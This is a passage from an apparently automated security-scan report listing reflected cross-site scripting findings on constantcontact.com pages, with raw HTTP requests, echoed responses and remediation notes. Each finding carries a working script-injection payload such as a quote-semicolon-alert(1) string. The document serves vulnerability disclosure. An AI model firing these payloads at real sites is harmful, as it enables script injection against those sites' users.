Set-Cookie: ctctblog=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:46 GMT; Path=/
Set-Cookie: cclp_cc="cc_01_ts=21456138|cc_02_ts=21456138|cc_02=impcc::IMP_143029301421510|cc_01=impcc::IMP_143029301421510|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:46 GMT; Path=/
Set-Cookie: cclp_partner="prt_04=partner.name::ROVING|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|prt_01_ts=21510869|prt_02_ts=21510889|prt_03_ts=21510937|prt_04_ts=21511014|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:46 GMT; Path=/
Set-Cookie: cclp_referral="partner=ROVING|impcc=IMP_143029301421510|cc=IMP_143029301421510|sitereferrer=http://www.constantcontact.com/error_404.jsp|partner.name=ROVING|pn=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:46 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-
...[SNIP]...
<![CDATA[
s.pageName='/mediacbb19';alert(1)//42197b77f17/pdf/get-started-building-your-social-media-presence.pdf';
s.server='534';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='';
s.campaign='IMP_143029301421510';
s.prop1='';
s.prop2='2010
...[SNIP]...

2.195. http://www.constantcontact.com/online-surveys/index.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /online-surveys/index.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f693'%3balert(1)//0e9f52e7f02 was submitted in the REST URL parameter 1. This input was echoed as 1f693';alert(1)//0e9f52e7f02 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online-surveys1f693'%3balert(1)//0e9f52e7f02/index.jsp HTTP/1.1
Host: www.constantcontact.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";

Response

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:54:47 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=32250B02CB35D9F8EFBA922A7C1A1076.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ctctblog=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:47 GMT; Path=/
Set-Cookie: cclp_cc="cc_01_ts=21456138|cc_02_ts=21456138|cc_02=impcc::IMP_143029301421510|cc_01=impcc::IMP_143029301421510|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:47 GMT; Path=/
Set-Cookie: cclp_partner="prt_04=partner.name::ROVING|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|prt_01_ts=21510869|prt_02_ts=21510889|prt_03_ts=21510937|prt_04_ts=21511014|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:47 GMT; Path=/
Set-Cookie: cclp_referral="partner=ROVING|impcc=IMP_143029301421510|cc=IMP_143029301421510|sitereferrer=http://www.constantcontact.com/error_404.jsp|partner.name=ROVING|pn=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:47 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 21148

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-
...[SNIP]...
<![CDATA[
s.pageName='/online-surveys1f693';alert(1)//0e9f52e7f02/index.jsp';
s.server='534';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='';
s.campaign='IMP_143029301421510';
s.prop1='';
s.prop2='20101124_21:29:13.262_F318E20503E8B28222E664EBA500
...[SNIP]...

2.196. http://www.constantcontact.com/online-surveys/index.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /online-surveys/index.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2da2b'%3balert(1)//df5f4b87b17 was submitted in the REST URL parameter 2. This input was echoed as 2da2b';alert(1)//df5f4b87b17 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online-surveys/2da2b'%3balert(1)//df5f4b87b17 HTTP/1.1
Host: www.constantcontact.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:54:56 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=D14C07B922DF81E72DA038E1CADDF2F4.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ctctblog=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:56 GMT; Path=/
Set-Cookie: cclp_cc="cc_01_ts=21456138|cc_02_ts=21456138|cc_02=impcc::IMP_143029301421510|cc_01=impcc::IMP_143029301421510|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:56 GMT; Path=/
Set-Cookie: cclp_partner="prt_04=partner.name::ROVING|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|prt_01_ts=21510869|prt_02_ts=21510889|prt_03_ts=21510937|prt_04_ts=21511014|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:56 GMT; Path=/
Set-Cookie: cclp_referral="partner=ROVING|impcc=IMP_143029301421510|cc=IMP_143029301421510|sitereferrer=http://www.constantcontact.com/error_404.jsp|partner.name=ROVING|pn=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:56 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 21173

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-
...[SNIP]...
<![CDATA[
s.pageName='/online-surveys/2da2b';alert(1)//df5f4b87b17/index.jsp';
s.server='534';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='';
s.campaign='IMP_143029301421510';
s.prop1='';
s.prop2='20101124_21:29:13.262_F318E20503E8B28222E664EBA500
...[SNIP]...

2.197. http://www.constantcontact.com/partners/index.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /partners/index.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b476c'%3balert(1)//af8f54c94c2 was submitted in the REST URL parameter 1. This input was echoed as b476c';alert(1)//af8f54c94c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /partnersb476c'%3balert(1)//af8f54c94c2/index.jsp HTTP/1.1
Host: www.constantcontact.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";

Response

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:54:16 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=0B9CBC98506F87FD1F99A0642752B4B0.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ctctblog=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:16 GMT; Path=/
Set-Cookie: cclp_cc="cc_01_ts=21456138|cc_02_ts=21456138|cc_02=impcc::IMP_143029301421510|cc_01=impcc::IMP_143029301421510|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:16 GMT; Path=/
Set-Cookie: cclp_partner="prt_04=partner.name::ROVING|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|prt_01_ts=21510869|prt_02_ts=21510889|prt_03_ts=21510937|prt_04_ts=21511014|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:16 GMT; Path=/
Set-Cookie: cclp_referral="partner=ROVING|impcc=IMP_143029301421510|cc=IMP_143029301421510|sitereferrer=http://www.constantcontact.com/error_404.jsp|partner.name=ROVING|pn=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:16 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 21130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-
...[SNIP]...
<![CDATA[
s.pageName='/partnersb476c';alert(1)//af8f54c94c2/index.jsp';
s.server='534';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='';
s.campaign='IMP_143029301421510';
s.prop1='';
s.prop2='20101124_21:29:13.262_F318E20503E8B28222E664EBA500
...[SNIP]...

2.198. http://www.constantcontact.com/partners/index.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /partners/index.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9b51'%3balert(1)//082c1ebca03 was submitted in the REST URL parameter 2. This input was echoed as b9b51';alert(1)//082c1ebca03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /partners/b9b51'%3balert(1)//082c1ebca03 HTTP/1.1
Host: www.constantcontact.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:54:21 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=C4D1EE149CAE23BFEA5EF3D005821978.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ctctblog=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:21 GMT; Path=/
Set-Cookie: cclp_cc="cc_01_ts=21456138|cc_02_ts=21456138|cc_02=impcc::IMP_143029301421510|cc_01=impcc::IMP_143029301421510|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:21 GMT; Path=/
Set-Cookie: cclp_partner="prt_04=partner.name::ROVING|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|prt_01_ts=21510869|prt_02_ts=21510889|prt_03_ts=21510937|prt_04_ts=21511014|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:21 GMT; Path=/
Set-Cookie: cclp_referral="partner=ROVING|impcc=IMP_143029301421510|cc=IMP_143029301421510|sitereferrer=http://www.constantcontact.com/error_404.jsp|partner.name=ROVING|pn=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:21 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 21133

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-
...[SNIP]...
<![CDATA[
s.pageName='/partners/b9b51';alert(1)//082c1ebca03/index.jsp';
s.server='534';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='';
s.campaign='IMP_143029301421510';
s.prop1='';
s.prop2='20101124_21:29:13.262_F318E20503E8B28222E664EBA500
...[SNIP]...

2.199. http://www.constantcontact.com/privacy_guarantee.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /privacy_guarantee.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51b5a'%3balert(1)//076de39721e was submitted in the REST URL parameter 1. This input was echoed as 51b5a';alert(1)//076de39721e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /51b5a'%3balert(1)//076de39721e HTTP/1.1
Host: www.constantcontact.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 04:54:55 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=E091DDCAAE08C4B12A68BC1EEDDE38F6.worker_landingPages; Path=/
Set-Cookie: impcc=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ctctblog=""; Domain=.constantcontact.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:55 GMT; Path=/
Set-Cookie: cclp_cc="cc_01_ts=21456138|cc_02_ts=21456138|cc_02=impcc::IMP_143029301421510|cc_01=impcc::IMP_143029301421510|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:55 GMT; Path=/
Set-Cookie: cclp_partner="prt_04=partner.name::ROVING|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|prt_01_ts=21510869|prt_02_ts=21510889|prt_03_ts=21510937|prt_04_ts=21511014|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:55 GMT; Path=/
Set-Cookie: cclp_referral="partner=ROVING|impcc=IMP_143029301421510|cc=IMP_143029301421510|sitereferrer=http://www.constantcontact.com/error_404.jsp|partner.name=ROVING|pn=ROVING|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 04:54:55 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 21106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-
...[SNIP]...
<![CDATA[
s.pageName='/51b5a';alert(1)//076de39721e/index.jsp';
s.server='534';
s.channel='';
s.pageType='errorPage';
s.pageURL='';
s.referrer='';
s.campaign='IMP_143029301421510';
s.prop1='';
s.prop2='20101124_21:29:13.262_F318E20503E8B28222E664EBA500
...[SNIP]...

2.200. http://www.constantcontact.com/safesubscribe.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.constantcontact.com
Path:   /safesubscribe.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a6af'%3balert(1)//643b2b45b88 was submitted in the REST URL parameter 1. This input was echoed as 5a6af';alert(1)//643b2b45b88 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /5a6af'%3balert(1)//643b2b45b88 HTTP/1.1
Host: www.constantcontact.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 02:29:13 GMT
Server: Apache
X-Powered-By:
Set-Cookie: JSESSIONID=F318E20503E8B28222E664EBA5008BBE.worker_landingPages; Path=/
Set-Cookie: cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 02:29:13 GMT; Path=/
Set-Cookie: cclp_partner="prt_01=partner.name::ROVING|prt_01_ts=21510869|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 02:29:13 GMT; Path=/
Set-Cookie: cclp_referral="partner.name=ROVING|pn=ROVING|partner=ROVING|sitereferrer=http://www.constantcontact.com/error_404.jsp|"; Domain=.constantcontact.com; Expires=Wed, 23-Feb-2011 02:29:13 GMT; Path=/
Pragma: no-cache, no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, private, no-cache, no-store, max-age=0, must-revalidate, no-cache="Set-Cookie"
Cache-Control: no-store
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: BIGipServerProdLP=2219185162.20480.0000; path=/
Content-Length: 21087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
